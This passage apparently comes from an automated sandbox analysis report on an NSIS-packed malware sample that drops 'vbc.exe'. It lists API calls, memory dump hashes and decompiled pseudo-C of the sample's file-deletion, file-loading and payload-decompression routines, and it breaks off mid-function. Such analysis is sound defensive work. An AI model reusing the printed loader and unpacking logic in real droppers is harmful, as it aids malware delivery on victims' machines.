                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 0040336A
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 00403379
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 00403384
                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 00403390
                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                                • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                                • CopyFileA.KERNEL32 ref: 0040340A
                                                • CloseHandle.KERNEL32(00000000), ref: 00403437
                                                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                                                • ExitProcess.KERNEL32 ref: 0040350B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                • String ID: $ /D=$ _?=$"$"C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$kozkonzcvlkexzh Setup$~nsu
                                                • API String ID: 3469842172-2720572982
                                                • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                                • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004054BD, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040576C(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423fc8 =  *0x423fc8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B98(0x421540, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056D2(_t72);
					} else {
						lstrcatA(0x421540, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421540,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405850(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E84(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423fc8 =  *0x423fc8 + 1;
										} else {
											E00404E84(0xfffffff1, _t72);
											E004058E6(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054BD(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421540 - 0x5c;
					if( *0x421540 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E93(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040568B(_t72);
							E00405850(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E84(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E84(0xfffffff1, _t72);
							return E004058E6(__eflags, _t72, 0);
						}
						L33:
						 *0x423fc8 =  *0x423fc8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                0x004054c8
                                                0x004054cc
                                                0x004054d5
                                                0x004054d8
                                                0x004054db
                                                0x004054e3
                                                0x004054e5
                                                0x004054e6
                                                0x00000000
                                                0x004054e6
                                                0x004054f5
                                                0x004054f5
                                                0x004054f8
                                                0x004054fb
                                                0x0040550f
                                                0x00405516
                                                0x0040551b
                                                0x0040551d
                                                0x0040552d
                                                0x0040551f
                                                0x00405525
                                                0x00405525
                                                0x00405532
                                                0x00405535
                                                0x00405540
                                                0x00405546
                                                0x0040554b
                                                0x0040555b
                                                0x0040555d
                                                0x00405563
                                                0x00405566
                                                0x00405569
                                                0x00405626
                                                0x00405626
                                                0x0040562a
                                                0x0040562c
                                                0x0040562c
                                                0x0040562c
                                                0x0040562c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040556f
                                                0x0040556f
                                                0x00405578
                                                0x0040557e
                                                0x00405583
                                                0x00405586
                                                0x00405588
                                                0x0040558c
                                                0x0040558e
                                                0x0040558e
                                                0x0040558c
                                                0x00405591
                                                0x00405594
                                                0x004055a7
                                                0x004055a9
                                                0x004055ae
                                                0x004055b5
                                                0x004055cd
                                                0x004055d3
                                                0x004055d9
                                                0x004055db
                                                0x00405600
                                                0x004055dd
                                                0x004055dd
                                                0x004055e1
                                                0x004055f5
                                                0x004055e3
                                                0x004055e6
                                                0x004055ee
                                                0x004055ee
                                                0x004055e1
                                                0x004055b7
                                                0x004055bd
                                                0x004055bf
                                                0x004055c5
                                                0x004055c5
                                                0x004055bf
                                                0x00000000
                                                0x004055b5
                                                0x00405596
                                                0x00405599
                                                0x0040559b
                                                0x00000000
                                                0x00000000
                                                0x0040559d
                                                0x0040559f
                                                0x00000000
                                                0x00000000
                                                0x004055a1
                                                0x004055a5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405605
                                                0x0040560f
                                                0x00405615
                                                0x00405615
                                                0x00405620
                                                0x00000000
                                                0x00405620
                                                0x00405537
                                                0x0040553e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004054fd
                                                0x004054fd
                                                0x004054ff
                                                0x00405630
                                                0x00405633
                                                0x00405636
                                                0x00405688
                                                0x00405688
                                                0x00405688
                                                0x00405638
                                                0x0040563b
                                                0x00405646
                                                0x0040564b
                                                0x0040564d
                                                0x00000000
                                                0x00000000
                                                0x00405650
                                                0x00405656
                                                0x0040565c
                                                0x00405662
                                                0x00405664
                                                0x00000000
                                                0x00405680
                                                0x00405666
                                                0x0040566a
                                                0x00000000
                                                0x00000000
                                                0x0040566f
                                                0x00000000
                                                0x00405676
                                                0x0040563d
                                                0x0040563d
                                                0x00000000
                                                0x0040563d
                                                0x00405505
                                                0x00405509
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405509

                                                APIs
                                                • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                                • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                                • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                                • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                                • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                                                • FindClose.KERNEL32(?), ref: 00405620
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-3287302484
                                                • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                                • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1001A402, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A4DC
                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 1001A506
                                                • ReadFile.KERNELBASE(00000000,00000000,1001A248,?,00000000), ref: 1001A51D
                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 1001A53F
                                                • CloseHandle.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C,7FDFFF66), ref: 1001A5B2
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 1001A5BD
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,1001A19C), ref: 1001A608
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                                • String ID:
                                                • API String ID: 721982790-0
                                                • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                • Instruction ID: 08dd0d8a1b5c369709eae3767430104e5388ea3a98c6ad7ed95ce82a3af55b79
                                                • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                • Instruction Fuzzy Hash: 1F616175E04714ABCB10CFB4C884BAEB7F6EF49650F108059E905EB395E674EE818B54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004061D4, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E004061D4() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
